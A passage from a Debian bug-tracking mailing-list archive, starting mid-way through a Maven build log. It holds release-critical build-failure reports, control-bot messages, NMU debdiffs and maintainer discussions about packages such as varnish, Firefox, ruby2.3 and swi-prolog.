[INFO] 
[INFO] Total time: 7.167 s
[INFO] Finished at: 2018-12-17T19:20:44-12:00
[INFO] Final Memory: 25M/594M
[INFO] 
[ERROR] Failed to execute goal on project wagon-tck-http: Could not resolve 
dependencies for project org.apache.maven.wagon:wagon-tck-http:jar:2.12: Cannot 
access central (https://repo.maven.apache.org/maven2) in offline mode and the 
artifact org.codehaus.plexus:plexus-classworlds:jar:2.x has not been downloaded 
from it before. -> [Help 1]
[ERROR] 
[ERROR] To see the full stack trace of the errors, re-run Maven with the -e 
switch.
[ERROR] Re-run Maven using the -X switch to enable full debug logging.
[ERROR] 
[ERROR] For more information about the errors and possible solutions, please 
read the following articles:
[ERROR] [Help 1] 
http://cwiki.apache.org/confluence/display/MAVEN/DependencyResolutionException
[ERROR] 
[ERROR] After correcting the problems, you can resume the build with the command
[ERROR]   mvn  -rf :wagon-tck-http
dh_auto_build: /usr/lib/jvm/default-java/bin/java -noverify -cp 
/usr/share/maven/boot/plexus-classworlds-2.x.jar:/usr/lib/jvm/default-java/lib/tools.jar
 -Dmaven.home=/usr/share/maven 
-Dmaven.multiModuleProjectDirectory=/build/1st/wagon2-2.12 
-Dclassworlds.conf=/etc/maven/m2-debian.conf 
-Dproperties.file.manual=/build/1st/wagon2-2.12/debian/maven.properties 
org.codehaus.plexus.classworlds.launcher.Launcher 
-s/etc/maven/settings-debian.xml -Ddebian.dir=/build/1st/wagon2-2.12/debian 
-Dmaven.repo.local=/build/1st/wagon2-2.12/debian/maven-repo --batch-mode 
package -DskipTests -Dnotimestamp=true -Dlocale=en_US returned exit code 1
debian/rules:9: recipe for target 'override_dh_auto_build' failed
make[1]: *** [override_dh_auto_build] Error 1

Processed: #859716 seafile-client: Please migrate to openssl1.1 in Buster

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> forwarded 859716 https://github.com/haiwen/seafile-client/issues/853
Bug #859716 [seafile-client] seafile-client: Please migrate to openssl1.1 in 
Buster
Changed Bug forwarded-to-address to 
'https://github.com/haiwen/seafile-client/issues/853' from 
'https://github.com/haiwen/seafile-client/pull/940'.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
859716: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=859716
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881814: libibverbs-dev no longer ships infiniband/driver.h

[Adrian Bunk]

Source: rdma-core
Version: 15-1
Severity: serious
Control: affects -1 libibverbs-dev src:librdmacm src:libcxgb3 src:libmlx4 
src:libipathverbs src:libmlx5 src:libibcm src:libmthca src:libnes src:libfabric

Many packages FTBFS due to libibverbs-dev no longer shipping
infiniband/driver.h, e.g.:

https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/libipathverbs.html

...
checking infiniband/driver.h usability... no
checking infiniband/driver.h presence... no
checking for infiniband/driver.h... no
configure: error:  not found.  libipathverbs requires 
libibverbs.

Processed: libibverbs-dev no longer ships infiniband/driver.h

[Debian Bug Tracking System]

Processing control commands:

> affects -1 libibverbs-dev src:librdmacm src:libcxgb3 src:libmlx4 
> src:libipathverbs src:libmlx5 src:libibcm src:libmthca src:libnes 
> src:libfabric
Bug #881814 [src:rdma-core] libibverbs-dev no longer ships infiniband/driver.h
Added indication that 881814 affects libibverbs-dev, src:librdmacm, 
src:libcxgb3, src:libmlx4, src:libipathverbs, src:libmlx5, src:libibcm, 
src:libmthca, src:libnes, and src:libfabric

-- 
881814: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881814
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#880958: yapf3 explicitly depends on python3.5

[Ana C. Custura]

Have  replied to you from the respective bugs. 

Thank you,
Ana
On Tue, Nov 14, 2017, at 10:36 PM, Ghislain Vaillant wrote:
> What about the patches fixing the other two bugs affecting yapf?
> Please consider checking the BTS.> 
> Ghis
> 
> 
> Le 14 nov. 2017 22:25, "Ana C. Custura"  a écrit :>> Hi 
> Ghis,
>> 
>> Thank you for the reply. There is a package on mentors that addresses>> both 
>> this bug (88958) and the split (879196) bug you raised. I am
>> waiting for my mentor to review it before uploading.
>> 
>> Ana
>> 
>> On Tue, Nov 14, 2017, at 08:59 AM, Ghislain Vaillant wrote:
>> > Thank you Matthias for raising this issue. CC'ing the maintainer
>> > in case>> > she's not subscribed.
>> >
>> > On Mon, 6 Nov 2017 11:52:00 +0100 Matthias Klose 
>> > wrote:>> > > Package: yapf3
>> > > Version: 0.17.0-1
>> > > Severity: serious
>> > > Tags: sid buster
>> > >
>> > > yapf3 explicitly depends on python3.5. One mistake certainly is
>> > > the b-d on>> > > python3-all, which is wrong for an application-only 
>> > > package.
>> >
>> > The application is not compliant with the Python packaging
>> > guidelines.>> > The public modules should be split from the application
>> > package. See>> > #879196 for a discussion about it.
>> >
>> > I have proposed a patch offline but it has yet to be applied.
>> > Fixing>> > #879196 will transitively fix the issue you just reported.
>> >
>> > > And if this package is application-only, why ship both Python2
>> > > and Python3 vesions?>> >
>> > It is nether application-only, nor Python 3 specific.
>> >
>> > Cheers,
>> > Ghis

Processed: New libcdio is now in unstable

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> severity 879891 serious
Bug #879891 {Done: gregor herrmann } 
[src:libdevice-cdio-perl] libdevice-cdio-perl: FTBFS against libcdio-dev 0.92
Severity set to 'serious' from 'important'
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
879891: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879891
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: Add found version and affects

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> found 881743 0.5.0-1
Bug #881743 {Done: Thomas Goirand } [fonts-roboto-fontface] 
openstack-dashboard: fails to upgrade from 'stretch': Couldn't find anything to 
import: /horizon/lib/roboto_fontface/css/roboto-fontface.scss
Marked as found in versions fonts-roboto-fontface/0.5.0-1.
> affects 881743 openstack-dashboard
Bug #881743 {Done: Thomas Goirand } [fonts-roboto-fontface] 
openstack-dashboard: fails to upgrade from 'stretch': Couldn't find anything to 
import: /horizon/lib/roboto_fontface/css/roboto-fontface.scss
Added indication that 881743 affects openstack-dashboard
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881743: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881743
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881808: varnish: CVE-2017-8807: Data leak - '-sfile' Stevedore transient objects

[Salvatore Bonaccorso]

Source: varnish
Version: 5.0.0-1
Severity: serious
Tags: patch security upstream fixed-upstream
Forwarded: https://github.com/varnishcache/varnish-cache/pull/2429
Control: fixed -1 5.0.0-7+deb9u2

Hi,

the following vulnerability was published for varnish.

CVE-2017-8807[0]:
Data leak - '-sfile' Stevedore transient objects

The fix for stretch-security has already been preared and will be
released shortly, already marking the version as fixed accordingly
since prepared before.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2017-8807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8807
[1] https://github.com/varnishcache/varnish-cache/pull/2429
[2] https://varnish-cache.org/security/VSV2.html

Regards,
Salvatore

Processed: varnish: CVE-2017-8807: Data leak - '-sfile' Stevedore transient objects

[Debian Bug Tracking System]

Processing control commands:

> fixed -1 5.0.0-7+deb9u2
Bug #881808 [src:varnish] varnish: CVE-2017-8807: Data leak - '-sfile' 
Stevedore transient objects
The source 'varnish' and version '5.0.0-7+deb9u2' do not appear to match any 
binary packages
Marked as fixed in versions varnish/5.0.0-7+deb9u2.

-- 
881808: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881808
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881802: Firefox gets unusable and with broken security after update

[Sylvestre Ledru]

severity 881802 normal
thanks


On 15/11/2017 11:44, Klaus Ethgen wrote:
> Package: firefox
> Version: 57.0-1
> Severity: grave
>
> The new update of firefox render it completely unusable and unsafe to
> use as essential addons are disabled without asking the user.
Lowering the severity as Firefox remains usable and safe.

The features that you are mentioning are provided by extension and not by the 
Firefox package itself.
In parallel, I guess some of them will be ported to 57 in the next few weeks.

Last but not least, you can still use Firefox esr:
https://tracker.debian.org/pkg/firefox-esr
Where the extensions will probably work.

Sylvestre

Processed: Re: Bug#881802: Firefox gets unusable and with broken security after update

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> severity 881802 normal
Bug #881802 [firefox] Firefox gets unusable and with broken security after 
update
Severity set to 'normal' from 'grave'
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881802: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881802
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#872712: [Parl-devel] Bug#872712: debian-parl: please remove transitional packages myspell-{af, en-gb, en-za, it, ky, sl, sw, th} and use hunspell-* instead

[Agustin Martin]

On Mon, Sep 25, 2017 at 06:20:02PM +0200, Agustin Martin wrote:
> On Mon, Aug 21, 2017 at 10:04:03AM +0200, Mattia Rizzolo wrote:
> > On Mon, Aug 21, 2017 at 02:33:02AM +0200, Jonas Smedegaard wrote:
> > > I will address this, but it may take time before I come around to it.
> > > 
> > > Please do go ahead with removal of the reverse dependency (at least from 
> > > testing): debian-parl is currently kicked from testing for other 
> > > reasons.
> > 
> > Ok, we will go ahead and remove them at the first occasion breaking
> > debian-parl.
> 
> Hi,
> 
> Just to note that myspell-ca dependency should also be changed to
> hunspell-ca. Andreas already changed bug title about this.

Hi, Jonas,

This part is still pending. 

> hunspell-ca package without myspell-ca has already been uploaded. However
> it cannot migrate to testing because of debian-parl dependency on
> myspell-ca (See #876732, myspell-ca cannot be removed from sid). 

Thanks in advance,

-- 
Agustin

Bug#881062: NMU for this bug

[Thomas Goirand]

Hi,

This bug is blocking a bunch of package migration to Buster, so I've
prepared an NMU. Debdiff is attached. I've uploaded the resulting
package to DELAYED/5, to leave you enough time to upload it yourself if
you prefer. I'm also available for sponsoring the package if you don't
have enough rights in the Debian archive.

Best regards,

Thomas Goirand (zigo)
diff -Nru flower-0.8.3+dfsg/debian/changelog flower-0.8.3+dfsg/debian/changelog
--- flower-0.8.3+dfsg/debian/changelog  2017-05-22 12:30:55.0 +
+++ flower-0.8.3+dfsg/debian/changelog  2017-11-15 11:04:06.0 +
@@ -1,3 +1,11 @@
+flower (0.8.3+dfsg-2.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Using python-sphinxcontrib.httpdomain instead of the old transition
+package with dash (Closes: #881062).
+
+ -- Thomas Goirand   Wed, 15 Nov 2017 11:04:06 +
+
 flower (0.8.3+dfsg-2) unstable; urgency=medium
 
   * Use local objects.inv to avoid internet access (Closes: #862246)
diff -Nru flower-0.8.3+dfsg/debian/control flower-0.8.3+dfsg/debian/control
--- flower-0.8.3+dfsg/debian/control2017-05-22 12:30:01.0 +
+++ flower-0.8.3+dfsg/debian/control2017-11-15 11:04:06.0 +
@@ -16,7 +16,7 @@
python-mock,
python-setuptools (>= 0.6b3),
python-sphinx,
-   python-sphinxcontrib-httpdomain,
+   python-sphinxcontrib.httpdomain,
python-tornado,
python3-all,
python3-doc,

Bug#881804: ruby2.3 FTBFS on i386: TestFloat#test_round_with_precision failure

[Adrian Bunk]

Source: ruby2.3
Version: 2.3.5-1
Severity: serious
Tags: patch

https://buildd.debian.org/status/fetch.php?pkg=ruby2.3=i386=2.3.5-1=1510668050=0

...

Finished tests in 490.087998s, 32.5941 tests/s, 4569.4386 assertions/s.

  1) Failure:
TestFloat#test_round_with_precision 
[/<>/test/ruby/test_float.rb:448]:
<5.02> expected but was
<5.01>.

15974 tests, 2239427 assertions, 1 failures, 0 errors, 78 skips

ruby -v: ruby 2.3.5p376 (2017-09-14) [i386-linux-gnu]
uncommon.mk:612: recipe for target 'yes-test-almost' failed
make[2]: *** [yes-test-almost] Error 1
make[2]: Leaving directory '/<>'
debian/rules:73: recipe for target 'override_dh_auto_test-arch' failed
make[1]: *** [override_dh_auto_test-arch] Error 2


If the exact precision is required, the following fixes it:

--- debian/rules.old2017-11-15 09:51:45.0 +
+++ debian/rules2017-11-15 10:10:18.0 +
@@ -11,6 +11,11 @@
 export TESTOPTS
 
 DEB_HOST_MULTIARCH := $(shell dpkg-architecture -qDEB_HOST_MULTIARCH)
+DEB_HOST_ARCH ?= $(shell dpkg-architecture -qDEB_HOST_ARCH)
+
+ifneq (,$(filter $(DEB_HOST_ARCH), i386))
+export DEB_CFLAGS_MAINT_APPEND=-ffloat-store
+endif
 
 export SOURCE := $(shell dpkg-parsechangelog -SSource)
 export RUBY_VERSION   := $(patsubst ruby%,%,$(SOURCE))

Processed: The bup FTBFS is fixed upstream

[Debian Bug Tracking System]

Processing control commands:

> tags -1 fixed-upstream
Bug #879213 [src:bup] bup FTBFS with git 1:2.15.0~rc1-1
Added tag(s) fixed-upstream.

-- 
879213: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879213
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#879213: The bup FTBFS is fixed upstream

[Adrian Bunk]

Control: tags -1 fixed-upstream

Upstream fix:
https://github.com/bup/bup/commit/292361d86d1cf0cc555681ae43371d66c8ebb366

cu
Adrian

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

Bug#876578: libykneomgr: diff for NMU version 0.1.8-2.2

[Adrian Bunk]

Dear maintainer,

I've uploaded another NMU for libykneomgr (versioned as 0.1.8-2.2)
for adding a dblatex build dependency.

cu
Adrian

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

diff -Nru libykneomgr-0.1.8/debian/changelog libykneomgr-0.1.8/debian/changelog
--- libykneomgr-0.1.8/debian/changelog	2017-10-21 13:08:23.0 +0300
+++ libykneomgr-0.1.8/debian/changelog	2017-11-15 12:47:23.0 +0200
@@ -1,3 +1,10 @@
+libykneomgr (0.1.8-2.2) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Add the missing build dependency on dblatex.
+
+ -- Adrian Bunk   Wed, 15 Nov 2017 12:47:23 +0200
+
 libykneomgr (0.1.8-2.1) unstable; urgency=medium
 
   * Non-maintainer upload.
diff -Nru libykneomgr-0.1.8/debian/control libykneomgr-0.1.8/debian/control
--- libykneomgr-0.1.8/debian/control	2016-07-25 11:26:06.0 +0300
+++ libykneomgr-0.1.8/debian/control	2017-11-15 12:46:50.0 +0200
@@ -5,7 +5,7 @@
 Uploaders: Simon Josefsson 
 Build-Depends: debhelper (>= 9), dh-autoreconf,
 	   libpcsclite-dev, libzip-dev, help2man, pkg-config,
-	   gtk-doc-tools
+	   gtk-doc-tools, dblatex
 Standards-Version: 3.9.8
 Homepage: https://developers.yubico.com/libykneomgr/
 Vcs-Git: https://github.com/Yubico/libykneomgr-dpkg.git

Bug#880235: NMU of the fix for this package

[Thomas Goirand]

Hi,

Since this is an RC bug, and that it hasn't been addressed for the last
15 days, I've prepared an NMU. It simply removes that last one assert in
the failing test, which is enough to have everything working again.

Debdiff is attached. I've uploaded to the DELAYED/5 queue.

Cheers,

Thomas Goirand (zigo)
diff -Nru blockdiag-1.5.3+dfsg/debian/changelog 
blockdiag-1.5.3+dfsg/debian/changelog
--- blockdiag-1.5.3+dfsg/debian/changelog   2017-06-04 03:08:49.0 
+
+++ blockdiag-1.5.3+dfsg/debian/changelog   2017-11-15 10:44:08.0 
+
@@ -1,3 +1,10 @@
+blockdiag (1.5.3+dfsg-5.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Add patch to remove one assert in test_node_attribute() (Closes: #880235).
+
+ -- Thomas Goirand   Wed, 15 Nov 2017 10:44:08 +
+
 blockdiag (1.5.3+dfsg-5) unstable; urgency=medium
 
   * debian/rules 
diff -Nru 
blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch
 
blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch
--- 
blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch
  1970-01-01 00:00:00.0 +
+++ 
blockdiag-1.5.3+dfsg/debian/patches/remove-one-assert-in-test_node_attribute.patch
  2017-11-15 10:43:45.0 +
@@ -0,0 +1,17 @@
+Description: Remove one assert in test_node_attribute
+Author: Thomas Goirand 
+Bug-Debian: https://bugs.debian.org/880235
+Forwarded: no
+Last-Update: 2017-11-15
+
+--- blockdiag-1.5.3+dfsg.orig/src/blockdiag/tests/test_builder_node.py
 blockdiag-1.5.3+dfsg/src/blockdiag/tests/test_builder_node.py
+@@ -95,7 +95,7 @@ class TestBuilderNode(BuilderTestCase):
+ self.assertNodeStacked(diagram, stacked)
+ self.assertNodeFontsize(diagram, fontsize)
+ self.assertNodeLabel_Orientation(diagram, orientations)
+-self.assertNodeBackground(diagram, backgrounds)
++#self.assertNodeBackground(diagram, backgrounds)
+ 
+ def test_node_height_diagram(self):
+ diagram = self.build('node_height.diag')
diff -Nru blockdiag-1.5.3+dfsg/debian/patches/series 
blockdiag-1.5.3+dfsg/debian/patches/series
--- blockdiag-1.5.3+dfsg/debian/patches/series  2017-06-04 02:06:07.0 
+
+++ blockdiag-1.5.3+dfsg/debian/patches/series  2017-11-15 10:42:59.0 
+
@@ -4,3 +4,4 @@
 fixes-test_node_attribute.patch
 fixes_test_fontmap_duplicated_fontentry1.patch
 848748-exception-ignored-in-Image-del.patch
+remove-one-assert-in-test_node_attribute.patch

Bug#881802: Firefox gets unusable and with broken security after update

[Klaus Ethgen]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Package: firefox
Version: 57.0-1
Severity: grave

The new update of firefox render it completely unusable and unsafe to
use as essential addons are disabled without asking the user.

- - Foxproxy - In the setup where I use firefox, I need to configure proxy
  far behind the possibilities that firefox gives me. So without that
  addon, I am actually cut of from internet completely.
  On one hand, that is good as otherwise I would be endangered due to
  the following disabled addons.
- - Noscript - Present internet is absolutely to dangerous to browse
  without Noscript. As a short term solution, JS could be completely
  disabled but it is needed to enable it on some trusted sites.
- - HTTPS Everywhere
- - Status-4-Evar - Without this addon, it is a blind flight without
  instruments to browse internet. Every link will be a surprise where it
  leads to.
- - Y U no validate - Without that addon it is easily possible to
  accidentally accept an invalid TLS certificate forever. That opens up
  for many problems.
- - DNSSEC/TLSA Validator - I need to be able to check the validity of
  TLSA entries. It is sad that firefox has no buildin check for that.
  But now it even disables the only addon that was able to verify them.
- - Cookie Monster

Beside that there are several addons that bring back some stuff that was
dropped from firefox but without, browsing is impossible.

- - Tabgruppen - Without that feature, I have about 1000 Tabs open at the
  same time. Firefox is unusable without that addon.
- - Tab Mix Plus - The same, it makes Tabbed browsing even more usable.
- - UAControl - Several sites require to set special UA to be able to
  access them. Including some embedded devices I need to use at work.

"Funny" think ist that noscript was updated too but the update is
incompatible to currect firefox.

- -- System Information:
The problem happened on a host without direct access to the internet so
I deleted the informations from the host where I report that bug from.

Note also, that the paging output of firefox prereportbug scripts break
the further usage of reportbug.
- -- 
Klaus Ethgen   http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16Klaus Ethgen 
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C
-BEGIN PGP SIGNATURE-
Comment: Charset: ISO-8859-1

iQGzBAEBCgAdFiEEMWF28vh4/UMJJLQEpnwKsYAZ9qwFAloMGpAACgkQpnwKsYAZ
9qzMXgwAs2Bgn9+53ZSfMqNtOsD3olD4Luf/CUQh1KNVdlCiko+E22OLj0HAkuMO
/JJsowwURhbQ8chHHBXMRtPkH6VPzjP8VqpGpyVFCwA9S/xob6tQ3tdfgIq57O48
uyQIy1u+V65KFdCXGFaM0LOa9+vaQXXIPQosJGk50RSXfuI1TutYRnksH2tsPtMp
PhZLbj9dMPQ4s/UX3fxlx0XiI2Y6PTjpuf2NYa5VErtygI+7NWnz0p8Pyz/ioT7k
rgs3Aq4LvPU5BHnxMYsXcfVohqrBRDzide8TbhSlgRCqJOQxV57lFVBEBecG0Wmi
vdbDgErdklI+Ds9H6/8ifNXxsxEIIuqNKnQqy84thEsVF3n6YBjgGo2qG3cf/Npl
POYLN1iG2meAR37HBjakgGaqqeDTGn36KiPg2kBQ7+L29BqwpO3RAerOMFSn9gLF
/0PMEJgNX8MlJyo9ormPWpin6Z9LYd+/zXXu/dqfr9kix+mPNKLndQPnUhqrUzCc
dchu7PuP
=lJO8
-END PGP SIGNATURE-

Processed: Version tracking fix

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> found 881764 7u111-2.6.7-1
Bug #881764 [src:openjdk-7] openjdk-7: several vulnerabilities
Marked as found in versions openjdk-7/7u111-2.6.7-1.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881764: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881764
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881756: swi-prolog: FTBFS on mips: Build killed with signal TERM

[Adrian Bunk]

On Wed, Nov 15, 2017 at 02:30:54PM +0500, Lev Lamberov wrote:
> Hi Adrian,

Hi Lev,

> Ср 15 ноя 2017 @ 08:06 Adrian Bunk :
>...
> > Same randomness on powerpcspe, and both have it already with 7.6.1+dfsg-1:
> > https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpc
> > https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpcspe
>...
> At least, I cannot think of any other reason that 7.6.1-1
> was built successfully on mips and 7.6.1-2 failed, where the only one
> change is disabling Java tests (due to CVE-2017-1000364). I've uploaded
> 7.6.1-2 on the next day after 7.6.1-1 upload.

you already quoted the reason:

> The main issue
> seems to be weaker read/write ordering constraints that break our
> lock-free data structures, resulting in more or less random bugs.

Based on the mips/powerpc/powerpcspe results one could say that there
is a 50% chance that a build attempt fails.

That would give a 37.5% probability for 2 builds failing and one 
succeeding when trying 3 times.

Considering the older mips failure and the more frequent 
powerpc/powerpcspe failures, the 7.6.1-1 success might
just have been "luck".

> Cheers!
> Lev

cu
Adrian

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

Processed: reassign 881743 fonts-roboto-fontface

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> reassign 881743 fonts-roboto-fontface
Bug #881743 [openstack-dashboard] openstack-dashboard: fails to upgrade from 
'stretch': Couldn't find anything to import: 
/horizon/lib/roboto_fontface/css/roboto-fontface.scss
Bug reassigned from package 'openstack-dashboard' to 'fonts-roboto-fontface'.
No longer marked as found in versions horizon/3:12.0.0-2.
Ignoring request to alter fixed versions of bug #881743 to the same values 
previously set
>
End of message, stopping processing here.

Please contact me if you need assistance.
-- 
881743: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881743
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: Merge duplicates

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> reassign 881742 src:caffeine
Bug #881742 [caffeine] caffeine will not start: ImportError: cannot import name 
'_gi'
Bug reassigned from package 'caffeine' to 'src:caffeine'.
No longer marked as found in versions caffeine/2.8.3-3.
Ignoring request to alter fixed versions of bug #881742 to the same values 
previously set
> forcemerge 880280 881742
Bug #880280 [src:caffeine] caffeine: FTBFS: dpkg-buildpackage: error: 
dpkg-source -b caffeine-2.8.3 subprocess returned exit status 2
Bug #881742 [src:caffeine] caffeine will not start: ImportError: cannot import 
name '_gi'
Severity set to 'serious' from 'grave'
Marked as found in versions caffeine/2.8.3-3.
Added tag(s) buster and sid.
Merged 880280 881742
> affects 880280 caffeine
Bug #880280 [src:caffeine] caffeine: FTBFS: dpkg-buildpackage: error: 
dpkg-source -b caffeine-2.8.3 subprocess returned exit status 2
Bug #881742 [src:caffeine] caffeine will not start: ImportError: cannot import 
name '_gi'
Added indication that 880280 affects caffeine
Added indication that 881742 affects caffeine
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
880280: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880280
881742: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881742
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#879631: closed by Paulo Henrique de Lima Santana <p...@softwarelivre.org> ()

[Adrian Bunk]

Control: reopen -1

On Tue, Nov 14, 2017 at 12:42:04PM +, Debian Bug Tracking System wrote:
> 
> Date: Tue, 14 Nov 2017 10:30:01 -0200
> From: Paulo Henrique de Lima Santana 
> To: 879631-d...@bugs.debian.org
> 
> Hi,
> 
> This package will be used as a dependency in a new package I'm doing as you 
> can see below.
> https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=858916
> 
> So, It is not useless and I need to keep it in Debian.

The missing dependency is an RC bug in any case.

> Best regards,

cu
Adrian

-- 

   "Is there not promise of rain?" Ling Tan asked suddenly out
of the darkness. There had been need of rain for many days.
   "Only a promise," Lao Er said.
   Pearl S. Buck - Dragon Seed

Processed: Re: Bug#879631 closed by Paulo Henrique de Lima Santana <p...@softwarelivre.org> ()

[Debian Bug Tracking System]

Processing control commands:

> reopen -1
Bug #879631 {Done: Paulo Henrique de Lima Santana } 
[python3-flask-socketio] python3-flask-socketio: missing dependency
Bug reopened
Ignoring request to alter fixed versions of bug #879631 to the same values 
previously set

-- 
879631: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=879631
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: Add affects

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> affects 881705 src:syslog-ng-incubator
Bug #881705 [syslog-ng-dev] syslog-ng-dev: syslog-ng.pc still requires eventlog
Added indication that 881705 affects src:syslog-ng-incubator
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881705: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881705
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Processed: tagging 881793

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tags 881793 + pending
Bug #881793 [src:daisy-player] fix ftbfs with updated libcdio-paranoia
Added tag(s) pending.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
881793: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881793
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#881756: swi-prolog: FTBFS on mips: Build killed with signal TERM

[Lev Lamberov]

Hi Adrian,

Ср 15 ноя 2017 @ 08:06 Adrian Bunk :
> On Wed, Nov 15, 2017 at 12:55:12AM +0500, Lev Lamberov wrote:
>>...
>> The most strange thing is that 7.6.1-1 built successfully on mips. The
>> only difference between 7.6.1-1 and 7.6.1-2 is that java tests (only
>> tests) are disabled now (via debian/rules).
>
> 7.3.33+dfsg-1 failed the same way a year ago:
> https://buildd.debian.org/status/logs.php?pkg=swi-prolog=mips
>
> I would not rule out that this might be an old bug causing random build
> failures, that either just happened twice in the row or became more
> likely due to some change somewhere.

In the past there were some wierd build problems from time to time. You
can find logs and build history in usual place. These build problems
were unreproducible and were typically resolved with rebuilding. Not
that time.

>> Note that the 7.6.1-2
>> version builds successfully on mipsel and mips64el (little-endian), but
>> fails on mips (big-endian).
>
>> The similar problem occures on powerpc [1][2], which also works in
>> big-endian mode:
>>...
>
> Same randomness on powerpcspe, and both have it already with 7.6.1+dfsg-1:
> https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpc
> https://buildd.debian.org/status/logs.php?pkg=swi-prolog=powerpcspe

True. And as I can see powerpcspe also works in big-endian mode.

I've informed upstream about the issue. Their answer is as follows:

> Interesting. I doubt this is due to big/little endian. The main issue
> seems to be weaker read/write ordering constraints that break our
> lock-free data structures, resulting in more or less random bugs. A
> number of the tests stress these parts of the system.  The test_cgc
> is one of them, while I'm pretty sure there are no endian issues in
> that code.
>
> Keri and I did a lot of stress-testing and code reviewing for this after
> we discovered this was the reason for a crash on ARM. The same problem
> easily reproduced on powerpc. After the fixes for 7.6.1, a couple of
> runs of the test suite passed ok on powerpc. I only ran many iterations
> for tests that causes problems before.

Upstream will try to run these stress tests on powerpc and mips again,
but they claim that they were not able to reproduce some issues with
these tests in 7.6.1. Guess the issue may be related to Debian build
environment. At least, I cannot think of any other reason that 7.6.1-1
was built successfully on mips and 7.6.1-2 failed, where the only one
change is disabling Java tests (due to CVE-2017-1000364). I've uploaded
7.6.1-2 on the next day after 7.6.1-1 upload.

Cheers!
Lev

Bug#880958: marked as done (yapf3 explicitly depends on python3.5)

[Debian Bug Tracking System]

Your message dated Wed, 15 Nov 2017 09:00:40 +
with message-id 
and subject line Bug#880958: fixed in yapf 0.19.0-1
has caused the Debian Bug report #880958,
regarding yapf3 explicitly depends on python3.5
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
880958: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=880958
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: yapf3
Version: 0.17.0-1
Severity: serious
Tags: sid buster

yapf3 explicitly depends on python3.5. One mistake certainly is the b-d on
python3-all, which is wrong for an application-only package.

And if this package is application-only, why ship both Python2 and Python3 
vesions?
--- End Message ---
--- Begin Message ---
Source: yapf
Source-Version: 0.19.0-1

We believe that the bug you reported is fixed in the latest version of
